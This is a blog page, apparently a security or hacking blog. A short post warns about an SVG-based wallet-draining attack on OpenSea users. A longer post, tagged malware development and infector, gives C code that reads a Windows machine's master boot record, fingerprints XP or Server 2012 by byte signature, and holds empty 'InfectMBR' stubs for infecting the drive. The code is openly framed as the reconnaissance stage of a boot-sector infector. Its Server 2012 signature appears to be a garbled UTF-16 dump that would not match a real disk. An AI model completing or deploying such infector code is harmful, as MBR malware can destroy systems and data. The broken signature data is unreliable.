Category: Techniques

OpenSea NFT Bug

Posted on October 14, 2021 - October 14, 2021 by admin

Users are being sent “gifts” in the form of image files that carry executable content, which runs within the browser context. The script siphons off people’s JS-powered wallets by communicating from inside the browser. It requires some social engineering to get an extra click that confirms the siphoning transaction.

Watch your wallets.

Posted in Current Events, TechniquesTagged cyrpto, javascript, opensea, phishing, svg, xml, xss

Read (and infect) Windows MBR

Posted on September 14, 2021 - September 14, 2021 by admin

This code is useful for detecting the exact version of Windows the target machine is running, and then choosing to infect it (by writing to PHYSICALDRIVE0). Windows Server 2012 and Windows XP are the versions recognised in this snippet.

#include "stdafx.h"

#include <string.h>

// Number of bytes read from the start of the physical drive in _tmain.
// NOTE(review): 1000 is not a multiple of the 512-byte sector size;
// confirm that a raw device read of this length succeeds on the target OS.
#define BUFFER_SIZE		1000
// Length in bytes of the WXP_MBR reference image below.
#define SZ_WXP_MBR		382
// Length in bytes of the W2K12_MBR reference image below. Note that this
// exceeds one 512-byte sector, so the comparison spans past sector 0
// into the following bytes of the BUFFER_SIZE read.
#define SZ_W2K12_MBR	870

// Reference image of the Windows XP boot-sector code and its message
// strings. Only this portion is kept: the partition table is left out
// because it is likely unique to each machine. IsWindowsXP() compares
// the first SZ_WXP_MBR bytes of a device read against this array.
unsigned char WXP_MBR[382] = {
    0x33, 0xC0, 0x8E, 0xD0, 0xBC, 0x00, 0x7C, 0xFB,
    0x50, 0x07, 0x50, 0x1F, 0xFC, 0xBE, 0x1B, 0x7C,
    0xBF, 0x1B, 0x06, 0x50, 0x57, 0xB9, 0xE5, 0x01,
    0xF3, 0xA4, 0xCB, 0xBD, 0xBE, 0x07, 0xB1, 0x04,
    0x38, 0x6E, 0x00, 0x7C, 0x09, 0x75, 0x13, 0x83,
    0xC5, 0x10, 0xE2, 0xF4, 0xCD, 0x18, 0x8B, 0xF5,
    0x83, 0xC6, 0x10, 0x49, 0x74, 0x19, 0x38, 0x2C,
    0x74, 0xF6, 0xA0, 0xB5, 0x07, 0xB4, 0x07, 0x8B,
    0xF0, 0xAC, 0x3C, 0x00, 0x74, 0xFC, 0xBB, 0x07,
    0x00, 0xB4, 0x0E, 0xCD, 0x10, 0xEB, 0xF2, 0x88,
    0x4E, 0x10, 0xE8, 0x46, 0x00, 0x73, 0x2A, 0xFE,
    0x46, 0x10, 0x80, 0x7E, 0x04, 0x0B, 0x74, 0x0B,
    0x80, 0x7E, 0x04, 0x0C, 0x74, 0x05, 0xA0, 0xB6,
    0x07, 0x75, 0xD2, 0x80, 0x46, 0x02, 0x06, 0x83,
    0x46, 0x08, 0x06, 0x83, 0x56, 0x0D, 0x0A, 0x00,
    0xE8, 0x21, 0x00, 0x73, 0x05, 0xA0, 0xB6, 0x07,
    0xEB, 0xBC, 0x81, 0x3E, 0xFE, 0x7D, 0x55, 0xAA,
    0x74, 0x0B, 0x80, 0x7E, 0x10, 0x00, 0x74, 0xC8,
    0xA0, 0xB7, 0x07, 0xEB, 0xA9, 0x8B, 0xFC, 0x1E,
    0x57, 0x8B, 0xF5, 0xCB, 0xBF, 0x05, 0x00, 0x8A,
    0x56, 0x00, 0xB4, 0x08, 0xCD, 0x13, 0x72, 0x23,
    0x8A, 0xC1, 0x24, 0x3F, 0x98, 0x8A, 0xDE, 0x8A,
    0xFC, 0x43, 0xF7, 0xE3, 0x8B, 0xD1, 0x86, 0xD6,
    0xB1, 0x06, 0xD2, 0xEE, 0x42, 0xF7, 0xE2, 0x39,
    0x56, 0x0D, 0x0A, 0x77, 0x23, 0x72, 0x05, 0x39,
    0x46, 0x08, 0x73, 0x1C, 0xB8, 0x01, 0x02, 0xBB,
    0x00, 0x7C, 0x8B, 0x4E, 0x02, 0x8B, 0x56, 0x00,
    0xCD, 0x13, 0x73, 0x51, 0x4F, 0x74, 0x4E, 0x32,
    0xE4, 0x8A, 0x56, 0x00, 0xCD, 0x13, 0xEB, 0xE4,
    0x8A, 0x56, 0x00, 0x60, 0xBB, 0xAA, 0x55, 0xB4,
    0x41, 0xCD, 0x13, 0x72, 0x36, 0x81, 0xFB, 0x55,
    0xAA, 0x75, 0x30, 0xF6, 0xC1, 0x01, 0x74, 0x2B,
    0x61, 0x60, 0x6A, 0x00, 0x6A, 0x00, 0xFF, 0x76,
    0x0D, 0x0A, 0xFF, 0x76, 0x08, 0x6A, 0x00, 0x68,
    0x00, 0x7C, 0x6A, 0x01, 0x6A, 0x10, 0xB4, 0x42,
    0x8B, 0xF4, 0xCD, 0x13, 0x61, 0x61, 0x73, 0x0E,
    0x4F, 0x74, 0x0B, 0x32, 0xE4, 0x8A, 0x56, 0x00,
    0xCD, 0x13, 0xEB, 0xD6, 0x61, 0xF9, 0xC3, 0x49,
    // ASCII message strings start here ("Invalid partition table", ...).
    0x6E, 0x76, 0x61, 0x6C, 0x69, 0x64, 0x20, 0x70,
    0x61, 0x72, 0x74, 0x69, 0x74, 0x69, 0x6F, 0x6E,
    0x20, 0x74, 0x61, 0x62, 0x6C, 0x65, 0x00, 0x45,
    0x72, 0x72, 0x6F, 0x72, 0x20, 0x6C, 0x6F, 0x61,
    0x64, 0x69, 0x6E, 0x67, 0x20, 0x6F, 0x70, 0x65,
    0x72, 0x61, 0x74, 0x69, 0x6E, 0x67, 0x20, 0x73,
    0x79, 0x73, 0x74, 0x65, 0x6D, 0x00, 0x4D, 0x69,
    0x73, 0x73, 0x69, 0x6E, 0x67, 0x20, 0x6F, 0x70,
    0x65, 0x72, 0x61, 0x74, 0x69, 0x6E, 0x67, 0x20,
    0x73, 0x79, 0x73, 0x74, 0x65, 0x6D
};

// Reference image used by IsWindows2012(); the first SZ_W2K12_MBR bytes
// of a device read are compared against it.
// NOTE(review): this array opens with 0xFF 0xFE and nearly every second
// byte thereafter is 0x00, and the trailing messages ("Invalid partition
// table", "Error loading operating system", "Missing operating system")
// appear with a 0x00 after each ASCII character. That is what a UTF-16LE
// text dump of the boot code looks like rather than raw sector bytes, so
// a raw read of the device is unlikely ever to match this image — confirm
// against a byte-level dump before relying on the signature.
unsigned char W2K12_MBR[870] = {
    0xFF, 0xFE, 0x33, 0x00, 0x14, 0x25, 0xC4, 0x00,
    0x68, 0x25, 0x5D, 0x25, 0x00, 0x00, 0x7C, 0x00,
    0xC4, 0x00, 0x14, 0x25, 0xC4, 0x00, 0x6A, 0x25,
    0x5B, 0x25, 0x00, 0x00, 0x7C, 0x00, 0x10, 0x25,
    0x00, 0x00, 0x06, 0x00, 0x63, 0x25, 0x00, 0x00,
    0x02, 0x00, 0x7F, 0x20, 0x64, 0x22, 0xF1, 0x00,
    0x50, 0x00, 0x68, 0x00, 0x1C, 0x00, 0x06, 0x00,
    0x66, 0x25, 0x1A, 0x22, 0x63, 0x25, 0x04, 0x00,
    0x00, 0x00, 0x5C, 0x25, 0x5B, 0x25, 0x07, 0x00,
    0xC7, 0x00, 0x7E, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x7C, 0x00, 0x0B, 0x00, 0x0F, 0x00, 0xE0, 0x00,
    0x0E, 0x00, 0x01, 0x00, 0xE2, 0x00, 0x3C, 0x25,
    0x10, 0x00, 0x93, 0x03, 0xB1, 0x00, 0x50, 0x25,
    0x18, 0x00, 0xEA, 0x00, 0x56, 0x00, 0x00, 0x00,
    0x55, 0x00, 0x5E, 0x25, 0x46, 0x00, 0x11, 0x00,
    0x05, 0x00, 0x5E, 0x25, 0x46, 0x00, 0x10, 0x00,
    0x00, 0x00, 0x24, 0x25, 0x41, 0x00, 0x57, 0x25,
    0xAC, 0x00, 0x55, 0x00, 0x50, 0x25, 0x13, 0x00,
    0x5D, 0x00, 0x72, 0x00, 0x0F, 0x00, 0xFC, 0x00,
    0x1A, 0x22, 0x55, 0x00, 0xAC, 0x00, 0x75, 0x00,
    0x09, 0x00, 0x48, 0x22, 0x34, 0x25, 0x01, 0x00,
    0x00, 0x00, 0x74, 0x00, 0x03, 0x00, 0xA0, 0x25,
    0x46, 0x00, 0x10, 0x00, 0x66, 0x00, 0x60, 0x00,
    0xC7, 0x00, 0x7E, 0x00, 0x10, 0x00, 0x00, 0x00,
    0x74, 0x00, 0x26, 0x00, 0x66, 0x00, 0x68, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x66, 0x00, 0xA0, 0x00, 0x76, 0x00, 0x08, 0x00,
    0x68, 0x00, 0x00, 0x00, 0x00, 0x00, 0x68, 0x00,
    0x00, 0x00, 0x7C, 0x00, 0x68, 0x00, 0x01, 0x00,
    0x00, 0x00, 0x68, 0x00, 0x10, 0x00, 0x00, 0x00,
    0x24, 0x25, 0x42, 0x00, 0xE8, 0x00, 0x56, 0x00,
    0x00, 0x00, 0xEF, 0x00, 0x20, 0x23, 0x50, 0x25,
    0x13, 0x00, 0x92, 0x01, 0xE2, 0x00, 0x00, 0x25,
    0x10, 0x00, 0xA7, 0x20, 0xB4, 0x03, 0x14, 0x00,
    0x55, 0x25, 0x01, 0x00, 0x02, 0x00, 0x57, 0x25,
    0x00, 0x00, 0x7C, 0x00, 0xE8, 0x00, 0x56, 0x00,
    0x00, 0x00, 0xE8, 0x00, 0x76, 0x00, 0x01, 0x00,
    0xE8, 0x00, 0x4E, 0x00, 0x02, 0x00, 0xE8, 0x00,
    0x6E, 0x00, 0x03, 0x00, 0x50, 0x25, 0x13, 0x00,
    0x66, 0x00, 0x61, 0x00, 0x73, 0x00, 0x1C, 0x00,
    0xA0, 0x25, 0x4E, 0x00, 0x11, 0x00, 0x75, 0x00,
    0x0C, 0x00, 0xC7, 0x00, 0x7E, 0x00, 0x00, 0x00,
    0xC7, 0x00, 0x0F, 0x00, 0xE4, 0x00, 0xE8, 0x00,
    0x00, 0x00, 0x93, 0x25, 0xC7, 0x00, 0xB4, 0x03,
    0xE4, 0x00, 0x55, 0x00, 0x32, 0x00, 0xA3, 0x03,
    0xE8, 0x00, 0x56, 0x00, 0x00, 0x00, 0x50, 0x25,
    0x13, 0x00, 0x5D, 0x00, 0xB4, 0x03, 0xA7, 0x20,
    0xFC, 0x00, 0x3E, 0x00, 0xA0, 0x25, 0x7D, 0x00,
    0x55, 0x00, 0xAC, 0x00, 0x75, 0x00, 0x6E, 0x00,
    0xA0, 0x00, 0x76, 0x00, 0x00, 0x00, 0xA6, 0x03,
    0xEC, 0x00, 0x00, 0x00, 0x75, 0x00, 0x17, 0x00,
    0xB7, 0x00, 0x91, 0x25, 0x64, 0x25, 0xB5, 0x00,
    0x64, 0x00, 0xA6, 0x03, 0xE2, 0x00, 0x00, 0x00,
    0x91, 0x25, 0x80, 0x25, 0xB5, 0x00, 0x60, 0x00,
    0xA6, 0x03, 0x7C, 0x00, 0x00, 0x00, 0x91, 0x25,
    0xA0, 0x00, 0xB5, 0x00, 0x64, 0x00, 0xA6, 0x03,
    0x75, 0x00, 0x00, 0x00, 0x1A, 0x22, 0x55, 0x25,
    0x00, 0x00, 0x57, 0x25, 0x50, 0x25, 0x1A, 0x00,
    0x66, 0x00, 0x23, 0x00, 0x14, 0x25, 0x75, 0x00,
    0x3B, 0x00, 0x66, 0x00, 0xFC, 0x00, 0x1A, 0x22,
    0x54, 0x00, 0x43, 0x00, 0x50, 0x00, 0x41, 0x00,
    0x75, 0x00, 0x32, 0x00, 0xFC, 0x00, 0x19, 0x22,
    0x02, 0x00, 0x01, 0x00, 0x72, 0x00, 0x2C, 0x00,
    0x66, 0x00, 0x68, 0x00, 0x07, 0x00, 0x57, 0x25,
    0x00, 0x00, 0x00, 0x00, 0x66, 0x00, 0x68, 0x00,
    0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x66, 0x00, 0x68, 0x00, 0x08, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x66, 0x00, 0x53, 0x00,
    0x66, 0x00, 0x53, 0x00, 0x66, 0x00, 0x55, 0x00,
    0x66, 0x00, 0x68, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x66, 0x00, 0x68, 0x00,
    0x00, 0x00, 0x7C, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x66, 0x00, 0x61, 0x00, 0x68, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x07, 0x00, 0x50, 0x25, 0x1A, 0x00,
    0x5A, 0x00, 0x32, 0x00, 0xF7, 0x00, 0xA9, 0x03,
    0x00, 0x00, 0x7C, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x50, 0x25, 0x18, 0x00, 0xE1, 0x00, 0x56, 0x25,
    0x07, 0x00, 0xB4, 0x03, 0x08, 0x00, 0xE1, 0x00,
    0x62, 0x25, 0x07, 0x00, 0xB4, 0x03, 0x03, 0x00,
    0xE1, 0x00, 0x61, 0x25, 0x07, 0x00, 0x32, 0x00,
    0xA3, 0x03, 0x05, 0x00, 0x00, 0x00, 0x07, 0x00,
    0xEF, 0x00, 0x61, 0x22, 0xBC, 0x00, 0x3C, 0x00,
    0x00, 0x00, 0x74, 0x00, 0x09, 0x00, 0x57, 0x25,
    0x07, 0x00, 0x00, 0x00, 0x24, 0x25, 0x0E, 0x00,
    0x50, 0x25, 0x10, 0x00, 0xB4, 0x03, 0x65, 0x22,
    0x20, 0x23, 0xB4, 0x03, 0xB2, 0x00, 0x2B, 0x00,
    0x54, 0x25, 0xA3, 0x03, 0x64, 0x00, 0xB4, 0x03,
    0x00, 0x00, 0x24, 0x00, 0x02, 0x00, 0xB1, 0x03,
    0xB0, 0x00, 0x24, 0x00, 0x02, 0x00, 0x1C, 0x25,
    // Message strings, each ASCII character followed by 0x00 (UTF-16LE).
    0x49, 0x00, 0x6E, 0x00, 0x76, 0x00, 0x61, 0x00,
    0x6C, 0x00, 0x69, 0x00, 0x64, 0x00, 0x20, 0x00,
    0x70, 0x00, 0x61, 0x00, 0x72, 0x00, 0x74, 0x00,
    0x69, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00,
    0x6E, 0x00, 0x20, 0x00, 0x74, 0x00, 0x61, 0x00,
    0x62, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x00, 0x00,
    0x45, 0x00, 0x72, 0x00, 0x72, 0x00, 0x6F, 0x00,
    0x72, 0x00, 0x20, 0x00, 0x6C, 0x00, 0x6F, 0x00,
    0x61, 0x00, 0x64, 0x00, 0x69, 0x00, 0x6E, 0x00,
    0x67, 0x00, 0x20, 0x00, 0x6F, 0x00, 0x70, 0x00,
    0x65, 0x00, 0x72, 0x00, 0x61, 0x00, 0x74, 0x00,
    0x69, 0x00, 0x6E, 0x00, 0x67, 0x00, 0x20, 0x00,
    0x73, 0x00, 0x79, 0x00, 0x73, 0x00, 0x74, 0x00,
    0x65, 0x00, 0x6D, 0x00, 0x00, 0x00, 0x4D, 0x00,
    0x69, 0x00, 0x73, 0x00, 0x73, 0x00, 0x69, 0x00,
    0x6E, 0x00, 0x67, 0x00, 0x20, 0x00, 0x6F, 0x00,
    0x70, 0x00, 0x65, 0x00, 0x72, 0x00, 0x61, 0x00,
    0x74, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x67, 0x00,
    0x20, 0x00, 0x73, 0x00, 0x79, 0x00, 0x73, 0x00,
    0x74, 0x00, 0x65, 0x00, 0x6D, 0x00
};




/*
 * IsUserAdmin - is the calling thread's token a member of BUILTIN\Administrators?
 *
 * Builds the well-known Administrators alias SID and asks
 * CheckTokenMembership() whether the current token (NULL = caller's)
 * holds it. Returns FALSE if the SID cannot be built, if the membership
 * query fails, or if the token is not a member; TRUE otherwise.
 * The SID is always released before returning.
 */
BOOL IsUserAdmin()
{
	SID_IDENTIFIER_AUTHORITY ntAuthority = SECURITY_NT_AUTHORITY;
	PSID adminsSid = NULL;
	BOOL isMember = FALSE;

	/* S-1-5-32-544: two sub-authorities, the rest unused. */
	if (!AllocateAndInitializeSid(&ntAuthority, 2,
			SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS,
			0, 0, 0, 0, 0, 0, &adminsSid))
		return FALSE;

	/* A failed query is reported as "not admin" rather than propagated. */
	if (!CheckTokenMembership(NULL, adminsSid, &isMember))
		isMember = FALSE;

	FreeSid(adminsSid);
	return isMember;
}

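// We look for exact matches at the moment.

/*
 * IsWindowsXP - do the first SZ_WXP_MBR bytes of mbr equal WXP_MBR?
 *
 * mbr: buffer holding at least SZ_WXP_MBR readable bytes (the caller's
 *      device read); NULL yields FALSE.
 * Returns TRUE on an exact byte-for-byte match, otherwise FALSE.
 *
 * memcmp() compares as unsigned char. The previous element-wise loop
 * compared a plain char (signed on MSVC) against an unsigned char, so any
 * reference byte >= 0x80 — the second byte, 0xC0, already — could never
 * match and the function always returned false on a real XP sector.
 */
BOOL IsWindowsXP(const char* mbr)
{
	if (mbr == NULL)
		return FALSE;
	return memcmp(mbr, WXP_MBR, SZ_WXP_MBR) == 0 ? TRUE : FALSE;
}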

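/*
 * IsWindows2012 - do the first SZ_W2K12_MBR bytes of mbr equal W2K12_MBR?
 *
 * mbr: buffer holding at least SZ_W2K12_MBR (870) readable bytes; NULL
 *      yields FALSE. Note that 870 bytes is more than one 512-byte
 *      sector, so the caller's read must extend past sector 0.
 * Returns TRUE on an exact byte-for-byte match, otherwise FALSE.
 *
 * memcmp() compares as unsigned char; the previous loop compared a
 * possibly-signed char against unsigned char, so reference bytes >= 0x80
 * (the very first byte, 0xFF, included) could never match.
 */
BOOL IsWindows2012(const char* mbr)
{
	if (mbr == NULL)
		return FALSE;
	return memcmp(mbr, W2K12_MBR, SZ_W2K12_MBR) == 0 ? TRUE : FALSE;
}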

/*
 * InfectMBR_XP - placeholder. The posted snippet leaves the body empty and
 * _tmain never calls it, so the program as shown only reads the device.
 */
void InfectMBR_XP()
{

}

/*
 * InfectMBR_2012 - placeholder. The posted snippet leaves the body empty
 * and _tmain never calls it, so the program as shown only reads the device.
 */
void InfectMBR_2012()
{

}



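/*
 * _tmain - read the first BUFFER_SIZE bytes of PHYSICALDRIVE0 (sector 0
 * is the MBR), save a copy to output.img, and report whether the boot
 * code matches one of the known reference images.
 *
 * The drive is opened read-only ("rb"); nothing is written back to it.
 * argc/argv are unused.
 *
 * Exit codes: 0 on success; -1 when not running as an administrator or
 * when output.img cannot be opened/written/closed; -2 when the device
 * cannot be opened or yields no data.
 *
 * Fixes over the original: the device and output handles are closed on
 * every path (the output file was never closed, and the device leaked
 * when the output open failed); the fread() result is checked and the
 * buffer is zero-filled so a short read leaves a zeroed tail rather than
 * uninitialised bytes; the captured bytes are actually written to
 * output.img, which was opened but never used.
 */
int _tmain(int argc, _TCHAR* argv[])
{
	int		rc = 0;
	FILE*		dosDevice = NULL;
	FILE*		outputFile = NULL;
	char		buffer[BUFFER_SIZE] = {0};
	size_t		got;

	(void)argc;
	(void)argv;

	if (!IsUserAdmin())
	{
		fprintf(stderr, "You must be admin\n");
		return -1;
	}

	/* Win32 device-namespace path for the first physical disk. */
	dosDevice = fopen("\\\\.\\PHYSICALDRIVE0", "rb");
	if (!dosDevice)
	{
		fprintf(stderr, "Unable to open MBR\n");
		return -2;
	}

	outputFile = fopen("output.img", "wb");
	if (!outputFile)
	{
		fprintf(stderr, "Unable to open output file\n");
		rc = -1;
		goto out;
	}

	/* Element size 1 so the return value is the number of bytes read. */
	got = fread(buffer, 1, sizeof buffer, dosDevice);
	if (got == 0)
	{
		fprintf(stderr, "Unable to read MBR\n");
		rc = -2;
		goto out;
	}

	/* Keep a copy of exactly what was read. */
	if (fwrite(buffer, 1, got, outputFile) != got)
	{
		fprintf(stderr, "Unable to write output file\n");
		rc = -1;
		goto out;
	}

	if (IsWindowsXP(buffer))
		fprintf(stdout, "Detected Windows XP MBR\n");
	else if (IsWindows2012(buffer))
		fprintf(stdout, "Detected Windows 2012 Server MBR\n");
	else
		fprintf(stdout, "MBR did not match a known image\n");

out:
	/* fclose() flushes; a failure here means output.img is incomplete. */
	if (outputFile && fclose(outputFile) != 0)
	{
		fprintf(stderr, "Unable to close output file\n");
		if (rc == 0)
			rc = -1;
	}
	if (dosDevice)
		fclose(dosDevice);

	return rc;
}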
Posted in Code Analysis, Malware Development, TechniquesTagged infector, mbr, windowsLeave a comment
